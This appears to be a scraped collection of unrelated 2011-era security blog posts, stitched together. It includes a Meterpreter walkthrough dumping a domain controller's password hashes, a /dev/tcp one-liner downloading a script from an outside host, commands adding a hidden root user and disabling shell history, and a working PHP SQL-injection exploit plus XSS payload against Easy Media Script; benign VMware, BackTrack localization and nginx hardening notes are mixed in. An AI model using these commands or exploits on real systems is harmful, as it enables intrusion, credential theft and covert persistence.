Thanks to Boss P
Thanks to Boss P, a decent guy. Boss P, you know what I mean.
When trying to dump password hashes on a Windows 2008 R2 64-bit box I constantly ran into the "The parameter is incorrect" error in meterpreter. So I have had to fall back on dropping binaries, which I really don't like doing because of the added clean-up and the chance of getting 'caught'. Well, with a bit of migration you'll be back to passing the hash. Here is how, with a bit of the thought process first:
=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 364 auxiliary - 43 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12622 updated today (2011.05.15)
msf >
[*] DC_IP:49220 Request received for /AYSBk...
[*] DC_IP:49220 Staging connection for target YSBk received...
[*] Patching Target ID YSBk into DLL
[*] DC_IP:49221 Request received for /BYSBk...
[*] DC_IP:49221 Stage connection for target YSBk received...
[*] Meterpreter session 7 opened (ATTACKER_IP:443 -> DC_IP:49221) at Sun May 15 21:37:31 +0000 2011
msf > sessions -i 7
[*] Starting interaction with 7...
meterpreter > sysinfo
System Language : en_US
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Computer : DOMAINCONTROLLE
Architecture : x64 (Current Process is WOW64)
Meterpreter : x86/win32
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x64 0
224 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
324 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
364 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
372 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
404 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
468 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
476 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
484 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
628 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
804 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
836 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
880 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
932 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
972 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
328 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1172 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1204 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
1252 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfsrs.exe
1288 dns.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dns.exe
1316 ismserv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\ismserv.exe
1360 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1392 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1464 wlms.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wlms\wlms.exe
1492 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfssvc.exe
1572 VMUpgradeHelper.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
1896 TPAutoConnSvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
2016 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
872 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
1268 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
2360 taskhost.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\taskhost.exe
2424 dwm.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\dwm.exe
2452 explorer.exe x64 1 SITTINGDUCK\juser C:\Windows\explorer.exe
2504 TPAutoConnect.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
2512 conhost.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\conhost.exe
2632 VMwareTray.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\VMwareTray.exe
2640 VMwareUser.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\VMwareUser.exe
2716 mmc.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\mmc.exe
3052 mscorsvw.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
2216 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
1932 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
2564 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1732 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
2992 notepad.exe x86 1 SITTINGDUCK\juser C:\Windows\SysWOW64\notepad.exe
1720 notepad.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\notepad.exe
meterpreter > getpid
Current pid: 2992
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
Ah, the wonderful 'The parameter is incorrect' error. OK, we are an admin, since we can see the owning user of the SYSTEM processes, so that isn't the issue, but let's run 'getprivs' just in case:
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeIncreaseQuotaPrivilege
SeMachineAccountPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeEnableDelegationPrivilege
SeManageVolumePrivilege
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
Boo. OK, so maybe we have to be 'SYSTEM'...
meterpreter > getsystem
...got system (via technique 1).
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
Still nothing. Maybe it requires that we be in a 64-bit process. PID 1720 was the 64-bit version of Notepad, let's try that...
meterpreter > migrate 1720
[*] Migrating to 1720...
[*] Migration completed successfully.
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
Damn, what about as 'SYSTEM'...
meterpreter > getsystem
...got system (via technique 1).
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
No joy. Hmm, what about a 'SYSTEM' process that was already there? 'dns.exe', PID 1288, should be good...
meterpreter > migrate 1288
[*] Migrating to 1288...
[*] Migration completed successfully.
meterpreter > hashdump
Administrator:500:MYLMHASH:MYNTLMHASH:::
Guest:501:MYLMHASH:MYNTLMHASH:::
krbtgtG:502:MYLMHASH:MYNTLMHASH:::
Domain Admin?:1000:MYLMHASH:MYNTLMHASH:::
juserN:1104:MYLMHASH:MYNTLMHASH:::
jane.user??:1105:MYLMHASH:MYNTLMHASH:::
DOMAINCONTROLLE$?:1001:MYLMHASH:MYNTLMHASH:::
meterpreter >
When using VMware you will often find that the disk space pre-allocated to a virtual machine is no longer enough, and you need to give VMware some more. Expand it as follows:
Environment: Windows XP, VMware, Fedora 10
Steps: 1. In a cmd window run: vmware-vdiskmanager -x 50GB "G:\CentOS.vmdk"
The "-x" parameter specifies the total size after expansion (including the space currently in use); "G:\CentOS.vmdk" specifies the virtual disk file to expand.
Once this command succeeds the space has been allocated to the virtual machine, but the Linux system installed inside cannot use it yet.
2. Enter the Linux system installed in the virtual machine and, as root, run:
After the localization is done, reboot; you will find the boot menu has been replaced by BT5's, from which you can freely choose between the Windows MBR and the BT5 system.
Connect the wireless card before entering BT5. Here the bundled gerix and feedingbottle (installed separately) are each demonstrated:
Open the menu and find gerix:
After entering monitor mode, scan and select the AP,
The whole localization process is much the same as the earlier Backtrack 4 localization.
1. apt-get install language-support-zh language-pack-zh
2. Settings -> System Settings -> Locale -> Add languages, and add Simplified Chinese
3. If there is no option to add Simplified Chinese: apt-get install language-selector; the option appears once installation finishes.
Localizing Firefox 4.0.1 in BackTrack 5:
Enter http://stage.mozilla.org/pub/mozilla.org/firefox/releases/4.0.1/linux-i686/xpi/zh-CN.xpi in the browser address bar
After pressing Enter a prompt appears; once the installation finishes, restart Firefox
Next enter "about:config" in the Firefox address bar, press Enter, click "I agree", and type "general.useragent.locale" into the filter
Double-click that entry, enter "zh-CN" in the dialog that pops up, confirm, and restart the browser
Starting the ibus input method:
Start ibus from System; the following prompt appears:
IBus has been started! If you can not use IBus, please add below lines in $HOME/.bashrc, and relogin your desktop.
export GTK_IM_MODULE=ibus
export XMODIFIERS=@im=ibus
export QT_IM_MODULE=ibus
If ibus will not start:
cd /home
vim .bashrc
export GTK_IM_MODULE=ibus
export XMODIFIERS=@im=ibus
export QT_IM_MODULE=ibus
Log out or reboot
Afterwards you can install a few small tools, such as tsclient
Source: mickey
1. Install the dependencies
mickey@pentestbox:~# sudo apt-get install build-essential libssl-dev libssh-dev
2. Download, build and install
wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
make install
1. Downloading a file when no download tool such as wget or nc is available
exec 5<>/dev/tcp/yese.yi.org/80 && echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat <&5 > c.pl
2. Adding a user with uid 0 on Linux
useradd -o -u 0 cnbird
3. Turning off the bash history
export HISTSIZE=0
export HISTFILE=/dev/null
<?php
if(!$argv[1])
die("
Usage : php exploit.php [site]
Example : php exploit.php http://site.tld/[PATH]/
");
print_r("
# Title......: [ Easy Media Script SQL Injection ]
# Author.....: [ Lagripe-Dz ]
# Date.......: [ 27-o5-2o11 ]
# Location ..: [ ALGERIA ]
# HoMe ......: [ Sec4Ever.com & Lagripe-Dz.org ]
# Download ..: [ http://easymediascript.com/ ]
# Gr33tz ....: [ All Sec4ever Member'z ]
-==[ ExPloiT ]==-
# SQL Inj : http://site/ems/?watch=1'
# XSS : http://site/ems/?go=\"><ScRiPt>alert(0)</ScRiPt>
-==[ Start ]==-
");
$t=array("db_user "=>"user()","db_version"=>"version()","db_name "=>"database()",
"UserName "=>"user","Password "=>"pass");
foreach($t as $r=>$y){
$x=@file_get_contents($argv[1]."?watch=-1'/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/1,group_concat(0x".bin2hex("<$r>").",$y,0x".bin2hex("<$r>")."),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**//**/fRoM/**//**/ip_admin%23");
preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz);
echo $u = ($dz[1][0]) ? "[-] $r : ".$dz[1][0]."\n" : "[-] $r : Failed !\n";
}
echo "[-] AdminPanel : ".$argv[1]."ip-admin/login.php\n";
print_r("
-==[ Finished ]==-
");
# END .. !
?>
Connections to Google's servers are sometimes fast, sometimes very slow, and sometimes fail entirely.
Because the site search calls Google's API, whenever Google's servers are slow the right sidebar just sits there loading...
Poor Google...
# dropbox
174.36.30.71 dropbox.com
174.36.30.71 www.dropbox.com
75.101.129.115 dl.dropbox.com
75.101.159.151 dl-web.dropbox.com
174.36.30.71 forums.dropbox.com
#Search
74.125.39.99 www.google.com
74.125.39.103 www.google.com
74.125.39.104 www.google.com
74.125.39.105 www.l.google.com
Actually, this issue was hyped quite a bit a while ago, but back then I wasn't paying much attention to Nginx, so I didn't take much notice. Now that I have run into it myself, I took a closer look.
One of my earlier nginx configurations already did a file-system check (originally only to save resources: having Nginx decide whether a file exists means non-existent files are never handed to FastCGI for parsing, which lightens FastCGI's load). I did not expect it to also block the cgi.fix_pathinfo vulnerability as a side effect; a pleasant surprise!
# return 404 for files that do not exist
if (!-e $request_filename) {
return 404;
}
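As an added example (not the author's configuration), here is the same idea applied per location: the exposed PHP handler pattern beside a hardened one. It assumes PHP-FPM listening on 127.0.0.1:9000, a document root of /var/www/html and an /uploads/ tree that should never execute code; the server name is a placeholder.

```nginx
server {
    listen 80;
    server_name example.test;      # placeholder
    root /var/www/html;            # assumed document root
    index index.php index.html;

    # Exposed pattern: every URI ending in .php is handed to PHP-FPM
    # without checking that the script exists. With cgi.fix_pathinfo=1
    # in php.ini, a request for /uploads/avatar.jpg/x.php makes PHP
    # fall back to the nearest existing file, /uploads/avatar.jpg,
    # and run it as PHP code.
    #
    # location ~ \.php$ {
    #     fastcgi_pass 127.0.0.1:9000;
    #     fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    #     include fastcgi_params;
    # }

    # Hardened pattern: the per-location equivalent of the author's
    # global "if (!-e $request_filename) { return 404; }" check.
    location ~ \.php$ {
        # Refuse to proxy unless the exact script file exists on disk,
        # so /uploads/avatar.jpg/x.php is answered with 404 before
        # PHP ever sees it.
        try_files $uri =404;

        fastcgi_pass 127.0.0.1:9000;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include fastcgi_params;
    }

    # Defence in depth: nothing under the upload tree reaches the PHP
    # handler at all, whatever extension the request carries.
    location ^~ /uploads/ {
        location ~ \.php$ { return 403; }
    }
}
```

Setting cgi.fix_pathinfo=0 in php.ini (or security.limit_extensions in the PHP-FPM pool) closes the same hole on the PHP side, so it still holds if the nginx rule is ever lost in a refactor.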